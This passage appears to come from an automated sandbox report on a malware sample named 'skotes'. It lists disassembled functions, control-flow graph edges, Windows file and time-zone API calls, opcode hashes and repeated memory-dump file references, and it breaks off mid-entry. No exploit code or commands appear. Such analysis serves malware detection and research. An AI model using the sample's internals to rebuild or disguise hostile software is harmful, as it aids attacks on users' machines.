                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                    • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                                                    • API String ID: 1721193555-3123340372
                                                                                                                                                                    • Opcode ID: a24d98b627d7028f10c1347c5ce27104599db80983dbf04b09a62e2abdccb68c
                                                                                                                                                                    • Instruction ID: 42b8fa465ec5f67654a76b18cc4c3153dba4e46052196971f139c584b52968dc
                                                                                                                                                                    • Opcode Fuzzy Hash: a24d98b627d7028f10c1347c5ce27104599db80983dbf04b09a62e2abdccb68c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE11470E00654DBDB64BB689C577DD7A73AB81720F98428CE4196B3C2DB354EC18BC6
                                                                                                                                                                    Function 00651ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1980 651abc-651aec call 65180a 1983 651b07-651b13 call 64bf3a 1980->1983 1984 651aee-651af9 call 6475e3 1980->1984 1990 651b15-651b2a call 6475e3 call 6475f6 1983->1990 1991 651b2c-651b75 call 651775 1983->1991 1989 651afb-651b02 call 6475f6 1984->1989 2001 651de1-651de5 1989->2001 1990->1989 1999 651b77-651b80 1991->1999 2000 651be2-651beb GetFileType 1991->2000 2005 651bb7-651bdd call 6475c0 1999->2005 2006 651b82-651b86 1999->2006 2002 651c34-651c37 2000->2002 2003 651bed-651c1e call 6475c0 2000->2003 2008 651c40-651c46 2002->2008 2009 651c39-651c3e 2002->2009 2003->1989 2028 651c24-651c2f call 6475f6 2003->2028 2005->1989 2006->2005 2007 651b88-651bb5 call 651775 2006->2007 2007->2000 2007->2005 2012 651c4a-651c98 call 64be85 2008->2012 2014 651c48 2008->2014 2009->2012 2022 651cb7-651cdf call 651522 2012->2022 2023 651c9a-651ca6 call 651984 2012->2023 2014->2012 2032 651ce4-651d25 2022->2032 2033 651ce1-651ce2 2022->2033 2023->2022 2030 651ca8 2023->2030 2028->1989 2034 651caa-651cb2 call 64af48 2030->2034 2036 651d27-651d2b 2032->2036 2037 651d46-651d54 2032->2037 2033->2034 2034->2001 2036->2037 2038 651d2d-651d41 2036->2038 2039 651ddf 2037->2039 2040 651d5a-651d5e 2037->2040 2038->2037 2039->2001 2040->2039 2042 651d60-651d93 call 651775 2040->2042 2047 651d95-651dc1 call 6475c0 call 64c04d 2042->2047 2048 651dc7-651ddb 2042->2048 2047->2048 2048->2039
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00651775: CreateFileW.KERNEL32(00000000,00000000,?,00651B65,?,?,00000000,?,00651B65,00000000,0000000C), ref: 00651792
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00651BD7
                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00651BE3
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00651BF6
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00651D9C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __dosmaperr$File$CreateType
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 3443242726-2852464175
                                                                                                                                                                    • Opcode ID: d8621a2f6f51a45f25e41dd2e998b34a2c958d128810e2690a23d98ca6019918
                                                                                                                                                                    • Instruction ID: 5076c50af30b7e165596fde2e55222692d905838d13a29b2d09cb193d66992af
                                                                                                                                                                    • Opcode Fuzzy Hash: d8621a2f6f51a45f25e41dd2e998b34a2c958d128810e2690a23d98ca6019918
                                                                                                                                                                    • Instruction Fuzzy Hash: ECA11532A041489FCF19AF68C891BEE3BB2AB07325F14018DEC51AF391EB359D5AC755
                                                                                                                                                                    Function 006526F2 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172timeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 2293 6526f2-65271a call 652133 call 652191 2298 652720-65272c call 652139 2293->2298 2299 652842-65289e call 646c87 call 6562ee 2293->2299 2298->2299 2304 652732-65273e call 652165 2298->2304 2311 6528a0-6528a6 2299->2311 2312 6528a8-6528ab 2299->2312 2304->2299 2310 652744-652765 call 64adf5 GetTimeZoneInformation 2304->2310 2322 652820-652841 call 65212d call 652121 call 652127 2310->2322 2323 65276b-65278c 2310->2323 2314 6528ee-652900 2311->2314 2312->2314 2315 6528ad-6528bd call 64b04b 2312->2315 2317 652910 2314->2317 2318 652902-652905 2314->2318 2331 6528c7-6528e0 call 6562ee 2315->2331 2332 6528bf 2315->2332 2320 652915-65292a call 64adf5 call 62cff1 2317->2320 2321 652910 call 6526f2 2317->2321 2318->2317 2324 652907-65290e call 652517 2318->2324 2321->2320 2326 652796-65279d 2323->2326 2327 65278e-652793 2323->2327 2324->2320 2336 6527af-6527b1 2326->2336 2337 65279f-6527a6 2326->2337 2327->2326 2348 6528e5-6528eb call 64adf5 2331->2348 2349 6528e2-6528e3 2331->2349 2334 6528c0-6528c5 call 64adf5 2332->2334 2353 6528ed 2334->2353 2344 6527b3-6527dc call 64ef17 call 64e926 2336->2344 2337->2336 2343 6527a8-6527ad 2337->2343 2343->2344 2360 6527de-6527e1 2344->2360 2361 6527ea-6527ec 2344->2361 2348->2353 2349->2334 2353->2314 2360->2361 2362 6527e3-6527e8 2360->2362 2363 6527ee-65280c call 64e926 2361->2363 2362->2363 2366 65280e-652811 2363->2366 2367 65281b-65281e 2363->2367 2366->2367 2368 652813-652819 2366->2368 2367->2322 2368->2322
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00666758), ref: 0065275C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationTimeZone
                                                                                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time$Xgf
                                                                                                                                                                    • API String ID: 565725191-1895067171
                                                                                                                                                                    • Opcode ID: f653bf43c19f41d179e274329696be9544b7a380dc97ed58b57de9d0f506fda6
                                                                                                                                                                    • Instruction ID: 78dfc82b7044e9d975a231f4e38ba074681f1eb17004d6beb5adeefe4b09f597
                                                                                                                                                                    • Opcode Fuzzy Hash: f653bf43c19f41d179e274329696be9544b7a380dc97ed58b57de9d0f506fda6
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A512871800216ABDB14DFB5CC919AE77BEEF46321F10026DF924A3291EB309E89CB54
                                                                                                                                                                    Function 00646FB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 2369 646fb4-646fe9 GetFileType 2370 6470a1-6470a4 2369->2370 2371 646fef-646ffa 2369->2371 2372 6470a6-6470a9 2370->2372 2373 6470cd-6470f5 2370->2373 2374 64701c-647038 call 6440f0 GetFileInformationByHandle 2371->2374 2375 646ffc-64700d call 64732a 2371->2375 2372->2373 2376 6470ab-6470ad 2372->2376 2378 6470f7-64710a 2373->2378 2379 647112-647114 2373->2379 2382 6470be-6470cb call 6475c0 2374->2382 2388 64703e-647080 call 64727c call 647124 * 3 2374->2388 2390 647013-64701a 2375->2390 2391 6470ba-6470bc 2375->2391 2376->2382 2383 6470af-6470b4 call 6475f6 2376->2383 2378->2379 2396 64710c-64710f 2378->2396 2381 647115-647123 call 62cff1 2379->2381 2382->2391 2383->2391 2405 647085-64709d call 647249 2388->2405 2390->2374 2391->2381 2396->2379 2405->2379 2408 64709f 2405->2408 2408->2391
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00646EE6), ref: 00646FD6
                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 00647030
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006470C5
                                                                                                                                                                      • Part of subcall function 0064732A: __dosmaperr.LIBCMT ref: 0064735F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                    • String ID: nd
                                                                                                                                                                    • API String ID: 2531987475-1435531252
                                                                                                                                                                    • Opcode ID: 045512e47aed0486b5ff17935974fb93e621c36ddc2a869d28316c848431a662
                                                                                                                                                                    • Instruction ID: 947e763b85675f89c56fe931a97ba085bf6c844f319175dfc59308f663b5f26a
                                                                                                                                                                    • Opcode Fuzzy Hash: 045512e47aed0486b5ff17935974fb93e621c36ddc2a869d28316c848431a662
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414DB1904204AFDB24EFB5DC419AFBBFAEF89700B14492DF856E7611E730A940DB61
                                                                                                                                                                    Function 00619BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
